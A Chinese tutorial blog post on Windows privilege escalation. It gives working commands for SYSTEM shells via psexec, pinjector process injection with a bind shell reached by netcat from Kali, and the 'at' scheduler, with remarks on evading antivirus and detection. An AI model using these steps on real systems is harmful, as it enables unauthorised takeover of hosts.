提权--windows
程序员文章站
2022-07-15 13:11:52
...
Windows权限
用户有三种:Users,Administrator,System
提权是将本地拥有administrator权限用户提权到system用户
windows基础提权命令
查看系统信息:systeminfo|findstr /B /C:”OS名称” /C:”OS版本”
主机名:hostname
环境变量:set
查看用户信息:net user
查看服务pid号:tasklist /svc | find “TermService”
查看端口:Netstat -ano | find “1488”
使用微软官方工具SysinternalsSuite提权
下载工具地址:[https://docs.microsoft.com/zh-cn/sysinternals/downloads/sysinternals-suite]
容易被排查,但是不会报毒
将psexec.exe放入到windows\system32下
执行命令,-i 交互式;-s远程执行
psExec.exe -i -s cmd
进程注入(pinjector.exe)提权
进程注入将pinjector注入到用户的进程里一起运行,进而同时拥有了对应的权限。
是一种比较隐蔽的手段,不会创建新的进程,很难发现,但是上传至目标主机时可能会报毒
从http://www.tarasco.org/security/Process_Injector/ 下载pinjector.exe文件。
放到主机的c盘根目录下
Pinjector.exe -l 列出进程,列出的所有进程都可以利用(找system对应权限的进程)
pinjector.exe -p 456 cmd 5959
然后查看到端口5959出于侦听状态,注入成功
Kali中使用nc工具
nc -nv 192.168.3.83 5959
执行whoami命令,可以看到目前是system权限
Win 2003使用at命令提权
at命令 系统调度任务的指令,会调用system指令完成任务
指定一个时间,操作系统自动执行一个命令
at 18:13 /interactive cmd #18:13分执行一个交互式的cmd
如果尝试使用win7,使用at命令不允许交互式